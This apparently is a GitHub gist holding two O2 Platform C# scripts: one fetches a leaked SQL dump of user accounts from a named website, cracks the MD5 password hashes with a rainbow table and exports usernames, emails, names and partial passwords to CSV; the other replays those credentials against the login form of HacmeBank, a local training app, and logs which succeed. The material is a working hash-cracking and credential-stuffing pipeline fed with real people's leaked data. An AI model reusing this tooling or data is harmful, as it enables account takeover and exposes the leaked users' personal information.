Skip to content

Instantly share code, notes, and snippets.

@DinisCruz

DinisCruz/Fuzz hacmeBank.cs

Created August 14, 2013 07:57
Show Gist options

  • Select an option

    Learn more about clone URLs
  • Save DinisCruz/6228857 to your computer and use it in GitHub Desktop.

Select an option

Learn more about clone URLs
Save DinisCruz/6228857 to your computer and use it in GitHub Desktop.
Download ZIP
O2 Script - Using captured account details on login form
Raw
extract data and create csv.cs
//var topPanel = "{name}".popupWindow(700,400);
var topPanel = panel.clear().add_Panel();
var rawData = "rawData".o2Cache<string>(
()=>"http://reflets.info/hcsr.gov.sy_users.sql".GET());
var rainbowFolder = @"C:\Users\o2\AppData\Roaming\OWASP_O2_Platform_5.3\8_12_2013\MD5_Hashes";
var rainbowTable = "rainbow1".o2Cache<Dictionary<string,string>>(
()=>{
// this file finds 64 passwords
var md5Hashes_File = rainbowFolder.pathCombine("(10x numbers - 6x length) M5_for_10_chars_with_6_depth.txt");
// this file finds 24 passwords
//var md5Hashes_File = rainbowFolder.pathCombine("(10x numbers and 26x letters - 4x length) M5_for_36_chars_with_4_depth.txt");
var items = new Dictionary<string,string>();
foreach(var line in md5Hashes_File.fileContents().lines())
{
var splittedLine = line.split("\t");
items.add(splittedLine.first().upper(), splittedLine.second());
}
return items;
});
var lines = rawData.fix_CRLF().lines();
var pwdCount = 0;
var userMappings =
(from line in lines
let splittedLine = line.remove("'","(",")").split(",")
let hash = splittedLine.third().upper()
let password = rainbowTable.hasKey(hash) ? rainbowTable[hash]
.removeLastChar()
.removeLastChar()+"**" : ""
let foundIndex = password.empty() ? "" : (++pwdCount).str()
where splittedLine.size() == 9 && password.valid()
select new {
userId = splittedLine.first(),
username = splittedLine.second(),
hash = hash,
password = password,
foundIndex = foundIndex,
email = splittedLine.fourth(),
firstName = splittedLine.fifth(),
lastName = splittedLine.value(5),
flag1 = splittedLine.value(6),
falg2 = splittedLine.value(7) });
topPanel.clear().add_TableList("User Mappings")
.show(userMappings);
var userDataFile = "UserData.csv".tempFile();
var userData = "";
foreach(var userMapping in userMappings)
userData += String.Join(",",userMapping.getProperties_AsArray()).line();
userData.saveAs(userDataFile);
userData.showInCodeViewer();
return userDataFile;
Raw
Fuzz hacmeBank.cs
//var ie = "ie_Ujmdj".o2Cache<WatiN_IE>(()=> panel.clear().add_IE()).silent(true); // ie ramdon value for o2cache makes this object to unique amongst multiple instances of this control
var topPanel = panel.clear().add_Panel();
var ie = topPanel.add_IE();
Func<string,string,bool> login =
(username, password)=>
{
ie.open("http://localhost:15582/HacmeBank_v2_Website/aspx/login.aspx");
ie.field("txtUserName").value(username);
ie.field("txtPassword").value(password);
ie.button("btnSubmit").click();
return ie.element("lblResult")
.innerHtml()
.neq("Invalid Login");
};
var usersData = @"C:\Users\o2\AppData\Roaming\OWASP_O2_Platform_5.3\8_14_2013\tmp17EA.tmp.UserData.csv"
.fileContents()
.split_onLines();
var dataGridView = topPanel.insert_Right("results")
.add_DataGridView();
dataGridView.add_Columns("Username", "Pwd", "Login result");
usersData.insert(5,"-1,jv,hash,jv789,aaa");
foreach(var userData in usersData)
{
var username = userData.split(",")[1];
var pwd = userData.split(",")[3];
var result = login(username, pwd);
dataGridView.add_Row(username, pwd, result);
}
return "done";
//using FluentSharp.Watin;
//O2Ref:FluentSharp.Watin.dll
//O2Ref:WatiN.Core.dll
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment